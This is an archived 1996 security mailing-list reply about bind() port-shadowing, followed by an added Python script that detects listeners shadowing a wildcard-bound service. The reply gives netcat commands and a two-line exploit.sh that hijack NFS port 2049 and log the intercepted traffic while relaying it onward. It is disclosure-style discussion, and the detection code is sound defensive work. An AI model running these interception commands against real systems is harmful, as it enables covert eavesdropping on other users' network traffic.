Re: BoS: bind() Security Problems

invalid opcode (coredump@nervosa.com)
Thu, 1 Feb 1996 21:39:18 -0800

Yes, but if you do this:
netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&

exploit.sh:
tee crap | netcat 192.88.209.5 2049

and then you can capture it all to the file: crap, and redirect it to the
original port.

Chris,
coredump@nervosa.com

On Thu, 1 Feb 1996, Darren Reed wrote:

> In some mail from Bernd Lehle, sie said:
> [...]
> > > Exploit:
> > [..]
> > > Run netcat:
> > >
> > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> > > listening on [192.88.209.5] 2049 ...
> >
> > To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667
>
> This won't get you messages between already connected clients and servers.
>
> Yes, you might be able to make clients connect, at first, to you and not
> a real server, but it is going to be obvious to the client: the connection
> won't complete as netcat won't generate the server replies which many
> clients now look for to indicate the confirmation of a connection.
>
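
A defender's check for the condition shown in this thread, a listener bound with -s to one specific address on a port (2049 here) that a service also holds on the wildcard address. This is an added example, not code from any poster in the thread; the record format, uids and process names are constructed assumptions, and only 192.88.209.5 and the port numbers come from the messages above.

```python
from collections import defaultdict

# Addresses that mean "all interfaces" in common socket listings.
WILDCARDS = {"0.0.0.0", "::", "*"}

# Constructed sample records: (proto, local address, port, owner uid, process).
# In practice these would be parsed from the host's socket table.
SAMPLE = [
    ("udp", "0.0.0.0", 2049, 0, "nfsd"),
    ("udp", "192.88.209.5", 2049, 1001, "nc"),
    ("tcp", "0.0.0.0", 6667, 995, "ircd"),
    ("tcp", "0.0.0.0", 22, 0, "sshd"),
    ("tcp", "127.0.0.1", 25, 0, "master"),
]


def find_shadowed_binds(listeners):
    """Flag specific-address listeners that share a proto/port with a
    wildcard listener owned by a different uid."""
    by_port = defaultdict(list)
    for proto, addr, port, uid, proc in listeners:
        by_port[(proto, port)].append((addr, uid, proc))

    findings = []
    for (proto, port), socks in sorted(by_port.items()):
        wild = [s for s in socks if s[0] in WILDCARDS]
        specific = [s for s in socks if s[0] not in WILDCARDS]
        for _, w_uid, w_proc in wild:
            for s_addr, s_uid, s_proc in specific:
                # Same owner usually means the service itself bound both.
                if s_uid != w_uid:
                    findings.append({
                        "proto": proto, "port": port,
                        "service": w_proc, "service_uid": w_uid,
                        "shadow_addr": s_addr, "shadow_proc": s_proc,
                        "shadow_uid": s_uid,
                    })
    return findings


if __name__ == "__main__":
    for f in find_shadowed_binds(SAMPLE):
        print("{proto}/{port}: {shadow_proc} (uid {shadow_uid}) on "
              "{shadow_addr} overlaps {service} (uid {service_uid})".format(**f))
```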